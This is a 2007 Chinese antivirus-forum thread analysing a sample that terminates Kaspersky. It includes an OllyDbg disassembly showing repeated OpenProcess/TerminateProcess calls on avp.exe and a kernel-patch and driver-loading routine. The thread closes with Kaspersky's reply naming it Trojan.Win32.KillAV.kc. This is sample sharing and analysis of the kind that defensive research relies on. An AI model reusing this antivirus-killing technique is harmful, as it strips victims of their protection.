楼主: caocao
收起左侧

[病毒样本] 在别的论坛上看到可以结束卡巴的病毒

[复制链接]
caocao
 楼主| 发表于 2007-7-8 20:05:43 | 显示全部楼层

回复 #9 wangjay1980 的帖子

可以中止卡巴的运行,版主高手啊,我是不敢运行,解压时卡巴主动防御就报了,但是高启发扫描没反应。
woai_jolin
发表于 2007-7-8 20:06:55 | 显示全部楼层
上报
wangjay1980
发表于 2007-7-8 20:09:10 | 显示全部楼层

回复 #11 caocao 的帖子

你那个是插入EXPLORER,任何EXE卡巴都会提示的,问题是我运行怎么蓝屏,晕死
小邪邪
发表于 2007-7-8 20:15:40 | 显示全部楼层

咖啡来看看咯

在最强保护下=它绝对“死”


切换到次级保护:执行后会弹出个窗口,也是完全防住了,没事

后台拦截日志:
2007-7-8 20:07:00
已由访问保护规则禁止  E:\Downloads\test\Downloads\Call.dat
C:\MIGBOT.SYS
防病毒标准保护:禁止远程创建/修改可执行文件和配置文件
已阻止的操作: 创建

试图在C盘根目录下释放一个驱动,不简单

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wangjay1980
发表于 2007-7-8 20:22:34 | 显示全部楼层
蓝屏,无法验证是否过卡7,那位运行一下
hj5abc
发表于 2007-7-8 20:30:06 | 显示全部楼层
偶怎么没蓝频 ?

弹出一个窗口.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
caocao
 楼主| 发表于 2007-7-8 20:39:09 | 显示全部楼层

回复 #13 wangjay1980 的帖子

是这样啊,又学习点知识。高手们研究吧,我就等着学习啦。
moonsilver
发表于 2007-7-8 21:16:22 | 显示全部楼层
RS挂
westbeck
发表于 2007-7-8 21:44:58 | 显示全部楼层
OD代码:
0040130B  |.  68 54304000   push    00403054                         ; /Arg1 = 00403054 ASCII "avp.exe"
00401310  |.  E8 4FFEFFFF   call    00401164                         ; \结束卡巴.00401164
00401315  |.  A3 38304000   mov     dword ptr [403038], eax
0040131A  |.  FF35 38304000 push    dword ptr [403038]               ; /ProcessId = 0
00401320  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401322  |.  6A 01         push    1                                ; |Access = TERMINATE
00401324  |.  E8 2B010000   call    <jmp.&kernel32.OpenProcess>      ; \OpenProcess
00401329  |.  8BD8          mov     ebx, eax
0040132B  |.  6A FF         push    -1                               ; /ExitCode = FFFFFFFF (-1.)
0040132D  |.  53            push    ebx                              ; |hProcess
0040132E  |.  E8 3F010000   call    <jmp.&kernel32.TerminateProcess> ; \TerminateProcess
00401333  |.  53            push    ebx                              ; /hObject
00401334  |.  E8 FD000000   call    <jmp.&kernel32.CloseHandle>      ; \CloseHandle
00401339  |.  68 C8000000   push    0C8                              ; /Timeout = 200. ms
0040133E  |.  E8 29010000   call    <jmp.&kernel32.Sleep>            ; \Sleep
00401343  |.  68 5C304000   push    0040305C                         ; /Arg1 = 0040305C ASCII "avp.exe"
00401348  |.  E8 17FEFFFF   call    00401164                         ; \结束卡巴.00401164
0040134D  |.  A3 38304000   mov     dword ptr [403038], eax
00401352  |.  FF35 38304000 push    dword ptr [403038]               ; /ProcessId = 0
00401358  |.  6A 00         push    0                                ; |Inheritable = FALSE
0040135A  |.  6A 01         push    1                                ; |Access = TERMINATE
0040135C  |.  E8 F3000000   call    <jmp.&kernel32.OpenProcess>      ; \OpenProcess
00401361  |.  8BD8          mov     ebx, eax
00401363  |.  6A FF         push    -1                               ; /ExitCode = FFFFFFFF (-1.)
00401365  |.  53            push    ebx                              ; |hProcess
00401366  |.  E8 07010000   call    <jmp.&kernel32.TerminateProcess> ; \TerminateProcess
0040136B  |.  53            push    ebx                              ; /hObject
0040136C  |.  E8 C5000000   call    <jmp.&kernel32.CloseHandle>      ; \CloseHandle
00401371  |.  68 C8000000   push    0C8                              ; /Timeout = 200. ms
00401376  |.  E8 F1000000   call    <jmp.&kernel32.Sleep>            ; \Sleep
0040137B  |.  68 64304000   push    00403064                         ; /Arg1 = 00403064 ASCII "avp.exe"
00401380  |.  E8 DFFDFFFF   call    00401164                         ; \结束卡巴.00401164
00401385  |.  A3 38304000   mov     dword ptr [403038], eax
0040138A  |.  FF35 38304000 push    dword ptr [403038]               ; /ProcessId = 0
00401390  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401392  |.  6A 01         push    1                                ; |Access = TERMINATE
00401394  |.  E8 BB000000   call    <jmp.&kernel32.OpenProcess>      ; \OpenProcess
00401399  |.  8BD8          mov     ebx, eax
0040139B  |.  6A FF         push    -1                               ; /ExitCode = FFFFFFFF (-1.)
0040139D  |.  53            push    ebx                              ; |hProcess
0040139E  |.  E8 CF000000   call    <jmp.&kernel32.TerminateProcess> ; \TerminateProcess
004013A3  |.  53            push    ebx                              ; /hObject
004013A4  |.  E8 8D000000   call    <jmp.&kernel32.CloseHandle>      ; \CloseHandle
004013A9  |.  68 C8000000   push    0C8                              ; /Timeout = 200. ms
004013AE  |.  E8 B9000000   call    <jmp.&kernel32.Sleep>            ; \Sleep
004013B3  |.  5F            pop     edi
004013B4  |.  5E            pop     esi
004013B5  |.  5B            pop     ebx
004013B6  \.  C3            retn
004013B7 >/$  6A 01         push    1                                ; /ShowState = SW_SHOWNORMAL
004013B9  |.  68 6C304000   push    0040306C                         ; |CmdLine = "Call.dat"
004013BE  |.  E8 C1000000   call    <jmp.&kernel32.WinExec>          ; \WinExec
004013C3  |.  E8 75FEFFFF   call    0040123D
004013C8  |.  0BC0          or      eax, eax
004013CA  |.  74 62         je      short 0040142E
004013CC  |.  A3 09304000   mov     dword ptr [403009], eax
004013D1  |.  FF1D 3C304000 call    far fword ptr [40303C]
004013D7  |.  8BC4          mov     eax, esp
004013D9  |.  8B6424 04     mov     esp, dword ptr [esp+4]
004013DD  |.  50            push    eax
004013DE  |.  A1 09304000   mov     eax, dword ptr [403009]
004013E3  |.  C680 B1B70100>mov     byte ptr [eax+1B7B1], 0EB
004013EA  |.  C680 86CA0100>mov     byte ptr [eax+1CA86], 0EB
004013F1  |.  5C            pop     esp
004013F2  |.  68 F8134000   push    004013F8
004013F7  |.  CB            retf                                     ;  RET 用作跳转到 004013F8
004013F8  |>  6A 00         push    0                                ; /pModule = NULL
004013FA  |.  E8 4F000000   call    <jmp.&kernel32.GetModuleHandleA> ; \GetModuleHandleA
004013FF  |.  A3 78304000   mov     dword ptr [403078], eax
00401404  |.  68 D0070000   push    7D0                              ; /Timeout = 2000. ms
00401409  |.  E8 5E000000   call    <jmp.&kernel32.Sleep>            ; \Sleep
0040140E  |.  E8 F5FEFFFF   call    00401308
00401413  |.  E8 F0FEFFFF   call    00401308
00401418  |.  E8 EBFEFFFF   call    00401308
0040141D  |.  6A 0A         push    0A                               ; /Arg4 = 0000000A
0040141F  |.  6A 00         push    0                                ; |Arg3 = 00000000
00401421  |.  6A 00         push    0                                ; |Arg2 = 00000000
00401423  |.  FF35 78304000 push    dword ptr [403078]               ; |Arg1 = 00000000
00401429  |.  E8 D2FBFFFF   call    00401000                         ; \结束卡巴.00401000
0040142E  |>  6A 00         push    0                                ; /ExitCode = 0
00401430  \.  E8 0D000000   call    <jmp.&kernel32.ExitProcess>      ; \ExitProcess

而Call.dat通过ZwSetSystemInformation加载驱动C:\MIGBOT.SYS

根本不能算是病毒,算是针对卡巴的。用比较暴力的方法,如果开着卡巴的监控,运行这个程序就会蓝屏,关掉监控就没事。
应该是针对卡巴的监控,造成内存冲突吧。具体的我没太看懂。
这样的程序卡巴可能不会入库

[ 本帖最后由 westbeck 于 2007-7-8 21:50 编辑 ]
caocao
 楼主| 发表于 2007-7-8 22:07:15 | 显示全部楼层
Hello.

New malicious software was found in the attached file.
Trojan.Win32.KillAV.kc
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com
http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.


> Attachment: Downloads.rar
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-11 00:23 , Processed in 0.096252 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表